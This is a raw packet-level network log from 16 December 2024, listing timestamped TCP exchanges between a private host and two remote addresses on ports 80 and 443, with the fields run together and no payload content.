                                                                                                                                                                                              Dec 16, 2024 01:01:23.491074085 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.491950035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.492007017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.492026091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.492083073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.493141890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.493177891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.493197918 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.493227005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.494322062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.494359016 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.494383097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.494414091 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.495475054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.495533943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.495848894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.495908976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.496656895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.496694088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.496715069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.496743917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.497858047 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.497895002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.497916937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.497946024 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.498981953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.499038935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.499840021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.499897003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.500149012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.500185966 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.500207901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.500237942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.501418114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.501455069 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.501477003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.501504898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.502482891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.502542019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.503222942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.503283978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.503703117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.503741026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.503763914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.503799915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.504816055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.504873991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.505229950 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.505287886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.506014109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.506072044 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.507189989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.507250071 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.507302046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.507354021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.507358074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.507416964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.508344889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.508402109 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.508586884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.508645058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.509533882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.509571075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.509593010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.509623051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.510710955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.510768890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.511750937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.511821032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.511892080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.511928082 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.511949062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.511979103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.513040066 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.513094902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.513214111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.513264894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.514206886 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.514259100 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.514534950 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.514585018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.515367985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.515419960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.515805006 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.515858889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.516561985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.516598940 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.516613960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.516644955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.517755985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.517791986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.517807007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.517837048 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.518990040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.519026041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.519046068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.519068956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.520052910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.520104885 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.521229029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.521265984 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.521281958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.521311998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.521325111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.521374941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.522439003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.522490978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.522495031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.522545099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.523565054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.523617029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.523816109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.523869038 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.524774075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.524811029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.524826050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.524858952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.525908947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.525960922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.526685953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.526741028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.527072906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.527128935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.527267933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.527323961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.528242111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.528292894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.529434919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.529486895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.529500961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.529526949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.529534101 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.529577017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.530613899 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.530652046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.530668020 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.530695915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.531763077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.531814098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.532591105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.532649040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.532968998 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.533005953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.533021927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.533054113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.534111023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.534167051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.535304070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.535356045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.535358906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.535393000 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.535410881 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.535439968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.536427021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.536479950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.537532091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.537583113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.537641048 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.537677050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.537693977 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.537728071 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.538796902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.538856030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.539370060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.539427996 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.539987087 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.540043116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.541142941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.541179895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.541201115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.541229963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.541256905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.541315079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.542316914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.542352915 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.542382956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.542412996 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.543474913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.543534994 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.543781996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.543833971 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.544620037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.544677973 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.553118944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.553184032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.553198099 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.553232908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.553268909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.553271055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.553293943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.553330898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.554514885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.554568052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.554578066 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.554630995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.555402994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.555460930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.555804014 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.555861950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.557221889 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.557235003 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.557296038 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.557316065 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.557354927 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.643596888 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.643608093 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.643659115 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.643687963 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.643703938 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.643721104 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.649203062 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.649214983 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.649270058 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.649282932 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.649319887 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.659559011 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.659571886 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.659629107 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.659648895 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.659703016 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.664654970 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.664666891 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.664726973 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.664750099 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.664809942 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.670322895 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.670335054 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.670391083 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.670409918 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.670461893 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.675453901 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.675466061 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.675518036 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.675529957 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.675568104 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.679225922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.679286957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.679402113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.679459095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.679792881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.679852009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.679907084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.679961920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.680696964 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.680710077 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.680759907 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.680768967 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.680805922 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.681006908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.681044102 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.681066990 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.681090117 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.682156086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.682193995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.682213068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.682244062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.683876038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.683913946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.683932066 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.683962107 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.684483051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.684520960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.684539080 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.684575081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.685643911 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.685679913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.685698986 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.685729027 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.686794996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.686851978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.686925888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.686981916 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.687967062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.688024998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.689153910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.689191103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.689208031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.689248085 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.689249039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.689302921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.690367937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.690424919 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.690547943 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.690604925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.691509008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.691545963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.691564083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.691591978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.692648888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.692717075 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.693231106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.693286896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.693865061 CET804980031.41.244.11192.168.2.4
